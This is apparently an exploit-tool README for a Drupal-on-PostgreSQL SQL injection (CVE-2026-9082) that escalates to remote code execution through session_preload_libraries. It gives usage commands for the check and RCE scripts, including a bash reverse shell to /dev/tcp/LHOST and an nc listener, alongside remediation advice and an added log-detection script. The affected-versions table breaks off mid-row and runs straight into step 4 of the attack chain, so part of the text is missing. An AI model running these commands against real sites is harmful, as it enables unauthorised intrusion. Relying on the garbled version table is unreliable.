## https://sploitus.com/exploit?id=9B5243ED-D9B1-5012-9F82-B3E47E6BC342
# CVE-2026-9082

Unauthenticated SQL injection in Drupal Core on PostgreSQL via `POST /user/login`, escalated to remote code execution through PostgreSQL `session_preload_libraries`.

Unlike existing public exploits that target JSON:API, this uses the **login endpoint**, which is always available and requires no modules or published content.

> **Advisory:** [SA-CORE-2026-004](https://www.drupal.org/sa-core-2026-004) | Risk: 23/25 (Highly Critical) | [CISA KEV](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)

## Affected versions

Only Drupal sites backed by **PostgreSQL** are vulnerable.

| Branch | Vulnerable | Patched |
|---|---|---|
| 11.3.x |  `lo_put` -> `lo_export`)
4. **Rewrite** `postgresql.auto.conf` to set `session_preload_libraries` and `dynamic_library_path`
5. **Reload** config with `pg_reload_conf()`
6. **Trigger** a new backend connection: PostgreSQL loads the module and executes the command
7. **Read** command output via `pg_read_file()`
8. **Cleanup**: restore original config and reload

## Prerequisites

**SQL injection** (`cve_2026_9082_check.py`):
- Drupal on PostgreSQL, any unpatched version
- No authentication required
- No JSON:API module required
- No published content required

**Remote code execution** (`cve_2026_9082_rce.py`):
- All of the above, plus:
- Database user must be a PostgreSQL **superuser**
- `docker` available locally (for cross-compilation on macOS)

## Usage

### Install dependencies

```bash
pip install -r requirements.txt
```

### SQLi check

```bash
python3 cve_2026_9082_check.py http://target:8081
```

With a proxy (Burp, mitmproxy, etc.):

```bash
python3 cve_2026_9082_check.py http://target:8081 --proxy http://127.0.0.1:8080
```

### Remote code execution

```bash
# Run a command
python3 cve_2026_9082_rce.py http://target:8081 "id"

# Reverse shell
python3 cve_2026_9082_rce.py http://target:8081 \
  "bash -c 'bash -i >& /dev/tcp/LHOST/4444 0>&1'"

# Listener
nc -lvnp 4444
```

## Demo

SQLi validation against a vulnerable instance:

![SQLi check output](images/check.png)

Escalation to remote code execution:

![RCE exploit output](images/rce.png)

## Remediation

**Update Drupal immediately** to a patched version:

- 11.3.10, 11.2.12, 11.1.10, 10.6.9, 10.5.10, or 10.4.10

If you cannot update right away:
- Switch to a **non-superuser** database account to prevent RCE escalation (the SQL injection itself remains exploitable until the patch is applied)
- Monitor logs for anomalous `POST /user/login` requests with JSON objects in the `name` field

Patches and details: [SA-CORE-2026-004](https://www.drupal.org/sa-core-2026-004)
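
The monitoring suggested above, as an added example that is not part of this repository: it flags `POST /user/login` records whose JSON `name` is not a string, and PostgreSQL reload messages that change the two settings the chain rewrites. The record schema (`method`, `path`, `body`, as a proxy or WAF that logs request bodies might emit), the sample data and the placeholder values are constructed assumptions; the log-message wording assumes PostgreSQL's default English server messages.

```python
import json
import re
from urllib.parse import urlsplit

# Settings the chain rewrites in postgresql.auto.conf before reloading.
WATCHED = {"session_preload_libraries", "dynamic_library_path"}
# Assumes PostgreSQL's default English message for a setting changed by a reload.
GUC_CHANGE = re.compile(r'parameter "([\w.]+)" changed to "(.*)"')

def suspicious_login(record: dict) -> bool:
    """Flag POST /user/login whose JSON body carries a non-string `name`."""
    path = urlsplit(record.get("path", "")).path.rstrip("/")
    if record.get("method") != "POST" or path != "/user/login":
        return False
    try:
        body = json.loads(record.get("body") or "")
    except ValueError:
        return False  # form-encoded or empty body: not the pattern described
    return isinstance(body, dict) and not isinstance(body.get("name", ""), str)

def guc_changes(pg_log_lines):
    """Return (setting, new_value) for watched settings changed by a reload."""
    hits = []
    for line in pg_log_lines:
        m = GUC_CHANGE.search(line)
        if m and m.group(1) in WATCHED:
            hits.append((m.group(1), m.group(2)))
    return hits

# Constructed sample data (hypothetical record schema, placeholder values).
HTTP_RECORDS = [
    {"method": "POST", "path": "/user/login?_format=json",
     "body": '{"name": "alice", "pass": "constructed"}'},
    {"method": "POST", "path": "/user/login",
     "body": '{"name": {"PLACEHOLDER_KEY": "PLACEHOLDER_VALUE"}, "pass": "x"}'},
    {"method": "POST", "path": "/user/login",
     "body": "name=bob&pass=constructed&form_id=user_login_form"},
]
PG_LOG = [
    '2026-06-08 10:00:01 UTC [412] LOG:  parameter "session_preload_libraries" changed to "PLACEHOLDER_LIB"',
    '2026-06-08 10:00:01 UTC [412] LOG:  parameter "work_mem" changed to "8MB"',
]

if __name__ == "__main__":
    for r in HTTP_RECORDS:
        if suspicious_login(r):
            print("ALERT http:", r["path"], r["body"])
    for name, value in guc_changes(PG_LOG):
        print("ALERT postgres:", name, "->", value)
```

Because the chain restores the original config during cleanup, the PostgreSQL server log is the place where the setting change stays visible after the fact.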

## Timeline

| Date | Event |
|---|---|
| 2026-05-20 | Drupal publishes SA-CORE-2026-004, patches released |
| 2026-05-22 | Active exploitation in the wild, added to CISA KEV |
| 2026-05-26 | Ambionics publishes SQLi-to-RCE technique via JSON:API |
| 2026-06-07 | This tool released |

## Credits

- **Vulnerability reported by** [Michael Maturi](https://www.drupal.org/sa-core-2026-004)
- **Login vector** (`/user/login`) described by [bitk & jfellus](https://www.yeswehack.com/news/cve-2026-9082-postgresql-drupal) (YesWeHack)
- **RCE technique** (`session_preload_libraries`) by [N. Maccary / Ambionics](https://blog.lexfo.fr/drupal-postgresql-sqli-to-rce.html) (Lexfo)
- **This implementation**: RCE adapted for the `/user/login` vector by r0m41n

## Disclaimer

This tool is provided for **authorized security testing** and **educational purposes only**.

Unauthorized access to computer systems is illegal. The author assumes no liability for any misuse of this software. Always obtain proper authorization before testing systems you do not own.